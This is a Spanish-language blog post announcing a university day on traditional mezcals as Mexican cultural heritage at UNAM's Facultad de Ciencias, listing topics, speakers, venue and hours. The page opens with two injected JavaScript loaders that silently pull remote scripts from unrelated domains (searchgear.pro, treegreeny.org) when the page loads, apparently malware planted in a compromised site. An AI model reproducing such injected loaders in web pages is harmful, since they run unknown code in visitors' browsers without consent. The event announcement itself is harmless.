;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 122. Jornada mezcalera en Ciencias-UNAM

122. Jornada mezcalera en Ciencias-UNAM


El martes 10 de abril se llevará a cabo en la Facultad de Ciencias de la UNAM la Primera Jornada Universitaria dedicada a “Los Mezcales Tradicionales (MT): Patrimonio Cultural de México”, cuyos objetivos son difundir la importancia que tienen los MT como Patrimonio Cultural, mostrar la complejidad y riqueza que tienen tras de sí y comentar las investigaciones realizadas en diferentes áreas de conocimiento de la UNAM, por ejemplo en botánica, ecología, química analítica, química de alimentos, antropología y derecho.

También se planteará la necesidad de profundizar dichas investigaciones y de desarrollar otras nuevas sobre: análisis sensorial; identificación de microrganismos responsables de la fermentación; construcción de la Colección Nacional de Mezcales; identificación de las regiones mezcaleras; desarrollo de instrumentos para monitorear la diversidad, reproducción y propagación de los magueyes mezcaleros silvestres y cultivados; desarrollo de metodologías para evaluar las condiciones socioculturales que favorecen la preservación de los MT; patrimonio cultural y propiedad intelectual; fiscalidad; creación de la biblioteca digital sobre magueyes y mezcales.

La jornada incluirá los siguientes temas y ponentes: Los magueyes y los mezcales como tema relevante para la investigación científica, Dr. César Carrillo editor de la revista Ciencias; Ecología, diversidad genética y preservación de los agaves mezcaleros, Dr. Luis Eguiarte del Instituto de Ecología; Presencia, pensamiento y sentir de los creadores y propietarios del mezcal, maestro mezcalillero José Luis Medina de Santa María Zumpahuacán, EdoMex; Diversidad de MT: diversidad infinita de aromas y sabores, Cornelio Pérez de la Logia de los Mezcólatras. La coordinación estará a cargo de Paloma Rivera de la carrera Desarrollo y gestión Interculturales de la Facultad de Filosofía.

Las pláticas serán en el Auditorio Alberto Barajas Celis (junto al edificio O y P) de la Facultad de Ciencias de 13 a 15 horas. Entrada libre.

http://impreso.milenio.com/node/9142501

Category: Milenio, Publicaciones

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *